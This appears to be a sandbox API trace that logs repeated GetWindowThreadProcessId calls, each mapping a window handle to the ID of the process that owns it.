	[0506.313] GetWindowThreadProcessId (in: hWnd=0x20206, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x9f8
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x20204, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa04
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x924
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x10200, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x8dc
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x201ec, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7dc
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x301d6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x768
	[0506.313] GetWindowThreadProcessId (in: hWnd=0x301e0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x764
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x201e4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x820
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x810
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x301f2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x794
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x83c
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x501be, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7ac
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x160162, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb44
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x500ea, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb5c
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x838
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x800a8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.314] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x300c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x300d2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x300ce, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x300d8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x300ac, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x101ac, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x818
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x101a8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x5b8
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x494
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1ec
	[0506.315] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x440
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7e8
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x730
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x2c8
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x31c
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x330
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x128
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x5c8
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x6f8
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x358
	[0506.316] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x73c
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb0
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x250
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x240
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x790
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x61c
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x540
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x538
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x568
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x538
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x568
	[0506.317] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x538
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x540
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x540
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x57c
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x554
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x528
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.318] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x79c
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4e0
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x44c
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x778
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x460
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x558
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.319] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4d0
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x10780, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10c4
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x1077a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x128c
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x10776, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x16e8
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x204a2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x16cc
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x10768, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x274
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x10764, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10e0
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x10760, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10cc
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x1075c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10c0
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x30750, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x10d0
	[0506.320] GetWindowThreadProcessId (in: hWnd=0x1072e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1198
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x10720, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1080
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x10712, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1074
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x10704, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x106c
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x106cc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1474
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x106c8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1414
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x106c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbd0
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x106c2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x550
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x20370, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa38
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x202e8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x16d0
	[0506.321] GetWindowThreadProcessId (in: hWnd=0x20338, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x16d4
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x106b6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x15bc
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10690, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x15a0
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10680, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x159c
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10670, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1598
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10660, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1594
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10650, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1590
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10640, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x158c
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10630, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1588
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x1062c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1584
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10628, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1580
	[0506.322] GetWindowThreadProcessId (in: hWnd=0x10624, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x157c
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x1061e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1488
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x10612, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1404
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x1060e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11b8
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105fc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbd4
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105ec, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe0c
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105dc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd30
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105c8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe70
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105b8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13b8
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x105a8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe20
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x1058a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe2c
	[0506.323] GetWindowThreadProcessId (in: hWnd=0x1057a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe00
	[0506.324] GetWindowThreadProcessId (in: hWnd=0x10576, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe04
	[0506.324] GetWindowThreadProcessId (in: hWnd=0x10570, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc94
	[0506.324] GetWindowThreadProcessId (in: hWnd=0x10568, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13b0
	[0506.324] GetWindowThreadProcessId (in: hWnd=0x10564, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13ac
	[0506.325] GetWindowThreadProcessId (in: hWnd=0x10560, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x13a8
	[0506.325] GetWindowThreadProcessId (in: hWnd=0x1055a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1374
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x10552, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x132c
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x10544, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1328
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12d0
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12cc
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x12c8
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1290
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1218
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1214
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11ec
	[0506.327] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11e8
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x11cc
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x1140
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe6c
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x6e8
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc6c
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf94
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xffc
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf74
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf08
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf0c
	[0506.328] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xed8
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xe90
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xea8
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfa8
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfbc
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfb8
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfb4
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfb0
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfac
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfc0
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xfd0
	[0506.329] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf88
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf84
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xf80
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xde0
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xddc
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xdd8
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd34
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd10
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xd0c
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc9c
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc74
	[0506.330] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc1c
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xc08
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xabc
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x24c
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbb0
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xbfc
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb10
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x374
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x368
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb28
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xae8
	[0506.331] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb14
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x95c
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa8c
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x46c
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb3c
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa90
	[0506.332] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xad0
	[0509.749] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa9c
	[0511.059] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xaa0
	[0513.446] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb1c
	[0513.446] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7e0
	[0513.446] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa74
	[0513.446] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x694
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xa28
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x9b0
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x8d8
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x940
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x93c
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x4ec
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x150
	[0513.447] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x720
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x3c4
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x7d4
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0x6c8
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb54
	[0513.448] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x1eda00 | out: lpdwProcessId=0x1eda00) returned 0xb54
